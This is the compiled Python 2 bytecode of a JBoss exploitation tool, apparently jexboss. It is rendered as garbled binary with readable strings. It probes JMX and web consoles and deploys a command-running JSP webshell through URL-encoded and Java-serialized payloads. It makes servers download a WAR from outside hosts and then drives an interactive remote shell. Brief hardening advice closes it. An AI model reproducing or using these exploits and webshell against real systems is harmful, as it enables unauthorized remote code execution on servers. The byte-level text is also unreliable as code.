1
�
2
���Vc@s�dd
lZdd
l
Z
dd
lZdd
lZdd
lZddlmZ
dZdZdZdZ	dZ
3
dZdZd	�Z
4
d
5
�Zd�Zd�Zd
6
�Zd�Zd�Zd�Zd�Zd�Zd�Zd�Zd�Zd�Ze
jddkr;
edede
jddeGHe
jd�

nee
j�
\ZZedkrl
e
jdZ nledkr�
edeGHede
jdeGHe
je�

n+edkr�
d j!d!e
jdg�
Z nee �
Z"xbd"d#d$gD]QZ#e"e#d%kse"e#d&kr�
e$d'�
j%�d(krEee e#�
qEq�
q�
We"j&�j'd%�
dkr}ed)eGHe	d*GHn+e"j&�j'd+�
dkr�e	d,eGHneGHd
S(-i����N(
t	urlencodessssssc
CsK|jd
�
}
t
|
�
dkr6|
djd�
dS|
jd�
dSdS(Ns://ii
t
:i(tsplittlen(turlttokens((spwn.pytgetHosts


c
Cs+|jd
�
}
|
ddkr#dSdSdS(Ns://ithttpsthttp(
R(RR((spwn.pytgetProtocols


c
CsK|d
jd�
}
t
|
�
dkr-|
dSt|�
dkrCdSdSdS(NiR
ii
Ri�
iP(RRR	(Rttoken((spwn.pytgetPorts




c

CsNt|�
d
kr.t
jt|�
t|�
�St
jt|�
t|�
�SdS(NR(R	thttplibtHTTPSConnectionRRtHTTPConnection(
R((spwn.pyt
7
getConnection%s

cCs�d
}tj
d�

t|�
}|jd|
�
|j�j}|d
kr�|j�
tj
d�

t|�
}|jd|
�
|j�j}|j�
n|S(Ni�
itGETi(ttimetsleepRtrequesttgetresponsetstatustclose(Rtpathtresulttconn((spwn.pytgetSuccessfully,s


8






9


10





11

c
Cs�td
|GHidd6dd6dd6}
x�|
j
�D]�}y�td|tGt|�
}|jd	|
|�
|j�j|
|<|
|d
12
ks�|
|dkr�tdtGHn	td
13
GH|j�
Wq5


td|tGHd|
|<q5Xq5W|
S(Ns ** Checking Host: %s **
14
sN/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfosjmx-consoles/web-console/ServerInfo.jspsweb-consoles/invoker/JMXInvokerServlettJMXInvokerServlets * Checking %s: 	tHEADi�i�
s[ VULNERABLE ]s[ OK ]s2
15
 * An error ocurred while contaction the host %s
16
i�
(	tGREENtkeystENDCRRRRtREDR(RRt
iR((spwn.pytcheckVul;s$
17

18



19






 

	



cCs�td
|GHd}|
dkrUt
|�
}|dkr�|dkr�t|�
}q�n6|
dkrpt|�
}n|
dkr�t|�
}n|dks�|dkr�tdtGHt||
�
ntd	tGHtj	d
20
�

dS(Ns(
21
 * Sending exploit code to %s. Wait...
22
i�
sjmx-consolei�i�
sweb-consoleRs? * Successfully deployed code! Starting command shell, wait...
23
st
24
 * Could not exploit the flaw automatically. Exploitation requires manual analysis...
25
   Waiting for 7 seconds...
26
 i(
27
RtexploitJmxConsoleFileRepositorytexploitJmxConsoleMainDeploytexploitWebConsoleInvokertexploitJMXInvokerFileRepositoryRt
28
shell_httpR RR(RttypeR((spwn.pytautoExploitSs
29











30


31

cCs.|
d
ks|
dkr!d}n|
dkr6d}nt|�
}|j
d|�
|j�
tjd�

d}d	GHtd
32
|dtGHi
dd
33
6}xwdddgD]f}t|�
}ti
|d6�
}|j
d||d|�
|d|j�j	�j
34
d�
d7}q�W|Gx
tdGHtdt�
}|dkr@
Pnt|�
}ti
|d6�
}|j
d||d|�
|j�}|j
35
dkr�
tdGH|j�
q
nd}y|j	�j
36
d�
d}Wn


tdGHn
X|jd�
dkrtd|j
37
d�
dtGHn|G|j�
q
dS(Nsjmx-consolesweb-consoles/jbossass/jbossass.jsp?Rs/shellinvoker/shellinvoker.jsp?RitsZ * - - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - * 
38
s * s: 
39
tjexbosss
40
User-Agentsuname -ascat /etc/issuetidtpppt
 t
>i
s#[Type commands or "exit" to finish]sShell> texiti�
s: * Error contacting the commando shell. Try again later...spre>s)An exception occurred processing JSP pages! * Error executing command "%s". t
=(RRRRRR RRRtreadRtBLUEt	raw_inputRtcount(RR(RRtresptheaderstcmdtstdout((spwn.pyR'msP

	

	


41


42




43





+

	







	

44







45


!

c
Cscd
}
d|
}td|
t
GHt|�
}|jd|�
|j�j}|j�
t|d�S(Ns http://125.46.92.66/jbossass.warsd/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=19&arg0=sV
46
 * Info: This exploit will force the server to deploy the webshell 
47
   available on: Rs/jbossass/jbossass.jsp(RRRRRRRR(RtjsptpayloadRR((spwn.pyR$�s






48

c
CsVd
}
d|
d}t|�
}|j
d|�
|j�j}|j�
t|d�S(Nsn%3C%25%40%20%70%61%67%65%20%69%6D%70%6F%72%74%3D%22%6A%61%76%61%2E%75%74%69%6C%2E%2A%2C%6A%61%76%61%2E%69%6F%2E%2A%22%25%3E%3C%70%72%65%3E%3C%25%20%69%66%20%28%72%65%71%75%65%73%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29%20%21%3D%20%6E%75%6C%6C%20%26%26%20%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%75%73%65%72%2D%61%67%65%6E%74%22%29%2E%65%71%75%61%6C%73%28%22%6A%65%78%62%6F%73%73%22%29%29%20%7B%20%50%72%6F%63%65%73%73%20%70%20%3D%20%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28%72%65%71%75%65%73%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29%29%3B%20%44%61%74%61%49%6E%70%75%74%53%74%72%65%61%6D%20%64%69%73%20%3D%20%6E%65%77%20%44%61%74%61%49%6E%70%75%74%53%74%72%65%61%6D%28%70%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%29%3B%20%53%74%72%69%6E%67%20%64%69%73%72%20%3D%20%64%69%73%2E%72%65%61%64%4C%69%6E%65%28%29%3B%20%77%68%69%6C%65%20%28%20%64%69%73%72%20%21%3D%20%6E%75%6C%6C%20%29%20%7B%20%6F%75%74%2E%70%72%69%6E%74%6C%6E%28%64%69%73%72%29%3B%20%64%69%73%72%20%3D%20%64%69%73%2E%72%65%61%64%4C%69%6E%65%28%29%3B%20%7D%20%7D%25%3Es
/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=jbossass.war&argType=java.lang.String&arg1=jbossass&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=s&argType=boolean&arg4=TrueRs/jbossass/jbossass.jsp(RRRRRR(RR:R;RR((spwn.pyR#�s



49

c
Cs�d
}
t|�
}idd6dd6}|j
dd|
|�
|j�}|j}|dkr�d	GH|j�
|j
d
50
d|
|�
|j�}|j}n|j�jd�
dkr�d
51
}n|j
t|d�S(Ns���sr)org.jboss.invocation.MarshalledInvocation��'A>��xppwx��G��S�srjava.lang.Integer⠤���8
Ivaluexrjava.lang.Number������xp�,`�sr$org.jboss.invocation.MarshalledValue�����JЙxpz����ur[Ljava.lang.Object;��X�s)lxpsrjavax.management.ObjectName��m�xpt,jboss.admin:service=DeploymentFileRepositoryxtstoreuq~tshellinvoker.wartshellinvokert.jspt
y<%@ page import="java.util.*,java.io.*"%><pre><%if(request.getParameter("ppp") != null && request.getHeader("user-agent").equals("jexboss") ) { Process p = Runtime.getRuntime().exec(request.getParameter("ppp")); DataInputStream dis = new DataInputStream(p.getInputStream()); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } }%>srjava.lang.Boolean� r�՜��
Zvaluexp
ur[Ljava.lang.String;��V��{Gxptjava.lang.Stringq~q~q~tbooleancy��xw
sr"org.jboss.invocation.InvocationKey��r�ד��
IordinalxppxsPapplication/x-java-serialized-object; class=org.jboss.invocation.MarshalledValuesContent-Types4text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2tAccepttPOSTs/invoker/JMXInvokerServleti�
s   Retrying...RtFailedii�
s/shellinvoker/shellinvoker.jsp(RRRRRR2R5R(RR;RR7tresponseR((spwn.pyR&�s"?

52


53



	



54





	

c
Cs�d
}
t|�
}idd6dd6}|j
dd|
|�
|j�}|j}|dkr�d	GH|j�
|j
d
55
d|
|�
|j�}|j}n|j
t|d�S(Ns�
��sr.org.jboss.console.remote.RemoteMBeanInvocation�O�zt���L
56
actionNametLjava/lang/String;[paramst[Ljava/lang/Object;[	signaturet[Ljava/lang/String;LtargetObjectNametLjavax/management/ObjectName;xptdeployur[Ljava.lang.Object;��X�s)lxp
t*http://www.joaomatosf.com/rnp/jbossass.warur[Ljava.lang.String;��V��{Gxp
tjava.lang.Stringsrjavax.management.ObjectName��m�xpt!jboss.system:service=MainDeployerxsZapplication/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocationsContent-Types4text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2R<R=s/web-console/Invokeri�
s   Retrying...Rs/jbossass/jbossass.jsp(RRRRRR(RR;RR7R?R((spwn.pyR%#
s!

57


58



	



59





cCsBtj
d
krtjd�

ntj
dkr>tjd�

ndS(Ntposixtcleartcetnttdostcls(RBsntRD(tostnametsystem(((spwn.pyRA[
s



c

Cs�t|�
d
ks+|dj
d�
dkr/dSt|djd�
�
dkrjd
d|d|dffS|dj
d�
dkr�|dj
d�
dkr�dSd
60
SdS(Nii
t
.s>You must provide the host name or IP address you want to test.s://s$Changing address "%s" to "http://%s"RiR*sParâmetro inválido(i
s>You must provide the host name or IP address you want to test.(iR*(i
sParâmetro inválido(RR5R(
targs((spwn.pyt	checkArgsa
s
+



2
iisZ
61
 * Not compatible with version 3 of python.
62
   Please run it with version 2.7 or lower.
63

64
s * Example:
65
   python2.7 s https://site.com
66

67
i
s
68

69
 * Error: %ss*
70
 Example:
71
 python %s https://site.com.br
72
iR*shttp://sjmx-consolesweb-consoleRi�i�
s   Continue ? (Yes/No)   t
ys) Results: potentially compromised server!s * - - - - - - -  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -*
73

74
 Recommendations: 
75
 - Remove web consoles and services that are not used, eg:
76
    $ rm web-console.war
77
    $ rm http-invoker.sar
78
    $ rm jmx-console.war
79
    $ rm jmx-invoker-adaptor-server.sar
80
    $ rm admin-console.war
81
 - Use a reverse proxy (eg. nginx, apache, f5)
82
 - Limit access to the server only via reverse proxy (eg. DROP INPUT POLICY)
83
 - Search vestiges of exploitation within the directories "deploy" or "management".
84

85
 References:
86
   [1] - https://developer.jboss.org/wiki/SecureTheJmxConsole
87
   [2] - https://issues.jboss.org/secure/attachment/12313982/jboss-securejmx.pdf
88

89
 - If possible, discard this server!
90

91
 * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -*
92
i�
sC
93

94
 * Results: 
95
   The server is not vulnerable to bugs tested ...
96

97
((RtsysturllibRFRRR tRED1R3RtBOLDtNORMALRRR	RRRR"R)R'R$R#R&R%RARKtversion_infotargvR0RtmessageRtjoint	mapResultR!R4tlowertvaluesR5(((spwn.pyt<module>sZ<






									.		$	T	8		$





98





 


99


100